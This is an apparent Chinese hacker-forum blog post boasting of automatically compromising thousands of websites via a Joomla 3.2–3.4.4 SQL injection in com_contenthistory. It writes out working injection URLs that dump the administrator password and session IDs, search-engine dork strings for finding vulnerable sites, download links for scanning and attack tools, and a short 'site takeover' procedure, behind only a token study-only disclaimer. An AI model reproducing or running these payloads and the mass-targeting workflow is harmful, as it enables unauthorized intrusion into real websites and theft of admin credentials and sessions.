日千站,漏洞分析加工具使用【附下载】

4696 Views

昨天晚上没事,写个扫描软件,自动拿站,早上起来发现有好几千个有漏洞哦。下面具体聊聊吧。

Joomla!是一套在国外相当知名的内容管理系统。Joomla!是使用PHP语言加上MySQL数据库所开发的软件系统,可以在Linux、 Windows、MacOSX等各种不同的平台上执行。目前是由Open Source Matters(见扩展阅读)这个开放源码组织进行开发与支持,这个组织的成员来自全世界各地,小组成员约有150人,包含了开发者、设计者、系统管理者、文件撰写者,以及超过2万名的参与会员。所以用的人非常 多。

暴出一个最新漏洞,之前也有不少漏洞,给出一个漏洞扫描器,老版本的,

~~~~~~~~~~

Joomla漏洞扫描器(Madleets Jscan)

Joomla 是一款著名的PHP内容管理系统,有许多站长都在使用Joomla,而本次提供的Madleets Jscan 则可以帮助您扫描Joomla的漏洞,从而杜绝黑客的入侵。可以检测Joomla整站程序搭建的网站是否存在文件包含、sql注入、命令执行等漏洞。这将帮助web开发人员和网站管理人员识别可能存在的安全弱点

1、确切的版本探测(可以探测出使用的Joomla整站程序的版本).2、常见的Joomla!基于web应用程序防火墙探测。3、搜索已知的Joomla安全漏洞和它的组件。4、文本和HTML格式的检测报告.5、立即的软件更新能力

下载地址:http://www.veryhuo.com/down/html/72834.html

这个是之前的扫描程序,后面重新改过了。

下面说个CMS Joomla 3.2—3.4.4最新的漏洞近日,Trustwave SpiderLabs 研究员Asaf Orpani 发现知名CMS Joomla 3.2—3.4.4版本中存在SQL注入漏洞,经安全狗实验室检测该漏洞危害巨大,影响范围广,利用难度低。目前官方已在3.4.5版本中修复该漏洞,请相关网站及时更新。

漏洞详细说明与利用方法

据 Asaf Orpani 分析得出,该SQL注入漏洞存在于

/administrator /components /com_contenthistory/ models/history.php 处。

以下几行描述Joomla原理的代码则可以帮助我们去利用这个漏洞(Payload)

执行该段代码之后返回页面如下,可直接获取用户session:

经测试可用如下payload直接获取管理员密码:

http://www.77169.com/joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

如图示:

以上payload不能爆session_id,经过我们实验室修改后下面这段可以完美爆session_id 。

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]= (select 1=updatexml(1,concat(0x5e24,(select session_id from jml_session limit 0,1),0x5e24),1))

如下图所示:

而在详细的了解了该漏洞的利用原理之后,给简单的办法吧,

~~~~~~~~~~~~

给个祥细,简单拿站过程

google hack,

百度 hack

搜索,

powered by joomla

index.php?option=com_user&view=reset&layout=confirm

administrator/

接着工具上,

~~~~~~~~~~~~~~~~~~

文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

百度网盘:http://pan.baidu.com/s/1sjta8Lv

下面就搞定了呀~~

在微信中不可能写的非常祥细,一会微信又给封了这篇文章,所以有问题大家在群里,论坛讨论吧。

附总结的一些入侵技巧,

漏洞,不行就抓包用明小子上传如果你觉得比较好,可以打赏比特币,哈哈

 比特币赞助打赏地址:13sbdFRyFBeqmXY9GJQf66s5cwmvLvWaAD

———————————-

要闻、干货、原创、专业关注“黑白之道” 微信:i77169华夏黑客同盟我们坚持,自由,免费,共享!

如未说明则本站原创,转载请注明出处:NULL » 日千站,漏洞分析加工具使用【附下载】

相关文章